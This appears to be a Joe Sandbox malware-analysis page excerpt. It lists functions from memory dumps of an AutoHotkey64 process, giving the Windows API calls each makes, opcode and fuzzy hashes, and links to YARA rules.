GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 9aa5fe056e9c53727ce2a1b7d4634133ecae4f9d86f11b9d5923e3ccc7358b0c
Instruction ID: c7901c820f03d12b2775e113f378e1968a4b71c9304ada7038c9288425af54c3
Opcode Fuzzy Hash: 9aa5fe056e9c53727ce2a1b7d4634133ecae4f9d86f11b9d5923e3ccc7358b0c
Instruction Fuzzy Hash: 8C91B4B160464486F7668B27E4843E937A1F38DBE4F11022AFB59A3BF6DB38C491C745

Function 0000000140046072 Relevance: 9.2, APIs: 6, Instructions: 184windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400B5520: GetFullPathNameW.KERNEL32(?,000000014004609D), ref: 00000001400B5556
Part of subcall function 00000001400B5520: WritePrivateProfileStringW.KERNEL32 ref: 00000001400B556A
Part of subcall function 00000001400B5520: WritePrivateProfileStringW.KERNEL32 ref: 00000001400B557E

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$PrivateProfileStringWrite$ClipboardCloseFullGlobalMessageNamePathPeekUnlock
String ID:
API String ID: 2214806735-0
Opcode ID: 99c27f6439f605b102a8a883b98952bdfe0888202adc444c3ec07bd71453a153
Instruction ID: 68d1044d1f71dbb35f8b654bbcbadcea29ed5abb4c867112420da44c7ac519ac
Opcode Fuzzy Hash: 99c27f6439f605b102a8a883b98952bdfe0888202adc444c3ec07bd71453a153
Instruction Fuzzy Hash: 5F91B3B1604A8486F7668B27E4443E937A1F34DBE4F11022AFB5963BF6DB38C490C745

Function 0000000140046373 Relevance: 9.2, APIs: 6, Instructions: 184windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014008E640: GetCurrentProcess.KERNEL32 ref: 000000014008E648
Part of subcall function 000000014008E640: OpenProcessToken.ADVAPI32 ref: 000000014008E65B

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$Process$ClipboardCloseCurrentGlobalMessageOpenPeekTokenUnlock
String ID:
API String ID: 3060718303-0
Opcode ID: 84cb8522e68b7b117c7684edcb12686257855ebe2d3a68075cbe9fc45e364162
Instruction ID: 8f6f8421086f979e884d7548c79e5264dfc77c97ff4b3141bc71aa46070feaf8
Opcode Fuzzy Hash: 84cb8522e68b7b117c7684edcb12686257855ebe2d3a68075cbe9fc45e364162
Instruction Fuzzy Hash: E291C3B160464486FB668B27E4843E937A1F38DBE4F11022AFB5963BF6DB38C491C705

Function 00000001400445F3 Relevance: 9.2, APIs: 6, Instructions: 184windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014005C5A0: SetWindowTextW.USER32 ref: 000000014005C5C4

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekTextUnlockWindow
String ID:
API String ID: 189804293-0
Opcode ID: 7416e20401230eb3c68878a0ad303d20471df5c5d9e8adcbdb4f441ea80f574b
Instruction ID: b6cae171230b3cc46c96fabc9a74d1cba0093c09e7e278979c50e2ad24120fdc
Opcode Fuzzy Hash: 7416e20401230eb3c68878a0ad303d20471df5c5d9e8adcbdb4f441ea80f574b
Instruction Fuzzy Hash: 4591A4B1604A8486F7668B27E4443E937E1F78DBE4F11022AEB5963BF6DB38C490C745

Function 0000000140044E50 Relevance: 9.2, APIs: 6, Instructions: 184windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 9a4851eb16602d3a068d01085d95fbcc0aefcc45d3fa1cdca3456820360ee4de
Instruction ID: 401306b8bb64d2ce7b63211373df6b72ebed5f1aeb631cb095bd7ee5b129c24d
Opcode Fuzzy Hash: 9a4851eb16602d3a068d01085d95fbcc0aefcc45d3fa1cdca3456820360ee4de
Instruction Fuzzy Hash: 7191A3B160464486F7668B27E4843E937A1F34DBE4F11022AFB5963BF6DB38C490C745

Function 0000000140046044 Relevance: 9.2, APIs: 6, Instructions: 183windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400B53D0: GetFullPathNameW.KERNEL32(?,000000014004606D), ref: 00000001400B541C
Part of subcall function 00000001400B53D0: WritePrivateProfileStringW.KERNEL32 ref: 00000001400B544F
Part of subcall function 00000001400B53D0: WritePrivateProfileStringW.KERNEL32 ref: 00000001400B54DC

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$PrivateProfileStringWrite$ClipboardCloseFullGlobalMessageNamePathPeekUnlock
String ID:
API String ID: 2214806735-0
Opcode ID: a08285758fe126b27f30d152b3fce8cee90623c27632b8a00610553d42e1ac37
Instruction ID: fcd4c39d063842643fad390391300953a6dcac2b820aea853d6900992676a1bb
Opcode Fuzzy Hash: a08285758fe126b27f30d152b3fce8cee90623c27632b8a00610553d42e1ac37
Instruction Fuzzy Hash: E391A2B1604B4486F7668B27E4843E937A1F34DBE4F11022AEB5963BF6DB38C490C745

Function 00000001400444E9 Relevance: 9.2, APIs: 6, Instructions: 183windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 41ac409cc5c98d6a407ef150f8e9d91f1056ca87765fd53e680efde4b42241c2
Instruction ID: bd989b711b344967e5e92285187565fef4e3431981ee340c7596af583025a409
Opcode Fuzzy Hash: 41ac409cc5c98d6a407ef150f8e9d91f1056ca87765fd53e680efde4b42241c2
Instruction Fuzzy Hash: 9A91A3B1604A4486F766CB27E4843E937A1F74DBE4F11022AEB5963BF6DB38C490C745

Function 00000001400446EE Relevance: 9.2, APIs: 6, Instructions: 183windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 996d0fa98e410271d6d7527e8c9d34de7c72bda04751f09715ef6418649f7931
Instruction ID: 6a2108ae844330661ca8d24bdf380bf5b09ebc7d7f083c7132a2734110a00254
Opcode Fuzzy Hash: 996d0fa98e410271d6d7527e8c9d34de7c72bda04751f09715ef6418649f7931
Instruction Fuzzy Hash: E591A2B1604B8486F7668B27E4843E937A1F74DBE4F11022AEB5963BF6DB38C490C745

Function 000000014004471C Relevance: 9.2, APIs: 6, Instructions: 183windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014005EFD0: GetWindowRect.USER32 ref: 000000014005F056

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekRectUnlockWindow
String ID:
API String ID: 1900757344-0
Opcode ID: d5a34565faab7dbc4182fd8b8a6889ba6501b2029ba08c8d3d4f5d9205bddf4c
Instruction ID: e9635ff68ce4868bccd448f2bb9beb2ab565c3983c9a7d0d9f81bb5af33f1579
Opcode Fuzzy Hash: d5a34565faab7dbc4182fd8b8a6889ba6501b2029ba08c8d3d4f5d9205bddf4c
Instruction Fuzzy Hash: C291A1B1604A4486F7668B27E4843E937A1F74DBE4F11022AEB5963BF6DB38C490C745

Function 0000000140044F91 Relevance: 9.2, APIs: 6, Instructions: 183windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: f619114e838fbd3434d0b77d239d55af9a8c20b899fb631b8b15299d65b2d00a
Instruction ID: b747b0d38b25c1aab6748d2921b02ad88dad49635f3aadf84fe81745ebd10fcf
Opcode Fuzzy Hash: f619114e838fbd3434d0b77d239d55af9a8c20b899fb631b8b15299d65b2d00a
Instruction Fuzzy Hash: 0391B2B1604A4486F7668B27E4843E937A1F38DBE4F11022AFB5963BF6DB38C490C745

Function 00000001400453C4 Relevance: 9.2, APIs: 6, Instructions: 183windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: ff001b32fe7c6d3cbb76ee65a1adba8cd962aad2bab466ed02000c605a4734e9
Instruction ID: 7c1b70db183864a898f4cc8f1345db95f3f12829979e2d063847def9f546c84b
Opcode Fuzzy Hash: ff001b32fe7c6d3cbb76ee65a1adba8cd962aad2bab466ed02000c605a4734e9
Instruction Fuzzy Hash: 3F91A3B1604B4486F7668B27E4443E937A1F74DBE4F11022AEB5963BF6DB38C490C745

Function 000000014004585B Relevance: 9.2, APIs: 6, Instructions: 183windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: c19772ab5566a14304e03c9ca00d11865f6c802ae4702a3b82a1571245c51417
Instruction ID: b24fa2383a836539ce7b3768bf12bf316320f6758285500967f2390fc08c5653
Opcode Fuzzy Hash: c19772ab5566a14304e03c9ca00d11865f6c802ae4702a3b82a1571245c51417
Instruction Fuzzy Hash: 7191A2B1604A4486F7668B27E4843E937A1F38DBE4F11022AEB5963BF6DB38C494C745

Function 00000001400439C5 Relevance: 9.2, APIs: 6, Instructions: 183windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 0ea3dd3eef68d799ce3836d1c6be8775b3c1791db492157bbcbd976700b0df64
Instruction ID: 5b2cf94c887333e95e5bfe7911be3b8296b1d3c47593bfcdfbe7aad4d3629339
Opcode Fuzzy Hash: 0ea3dd3eef68d799ce3836d1c6be8775b3c1791db492157bbcbd976700b0df64
Instruction Fuzzy Hash: EF91A2B1604A8486F7668B27E4843E937A1F34DBE4F11022AEB5963BF6DB38C490C745

Function 0000000140044F9A Relevance: 9.2, APIs: 6, Instructions: 182windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400401DA
CloseClipboard.USER32 ref: 00000001400401E7
GetTickCount.KERNEL32 ref: 00000001400401FA
PeekMessageW.USER32 ref: 000000014004022E
GetTickCount.KERNEL32 ref: 0000000140040242
GetTickCount.KERNEL32 ref: 0000000140040322

Memory Dump Source

Source File: 00000013.00000002.4207518182.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000013.00000002.4207473834.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.00000001400EE000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207687115.0000000140103000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207803945.0000000140123000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207839316.0000000140126000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207876948.0000000140127000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207936740.0000000140130000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4207970093.0000000140139000.00000010.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.4208001738.000000014013C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_140000000_AutoHotkey64.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
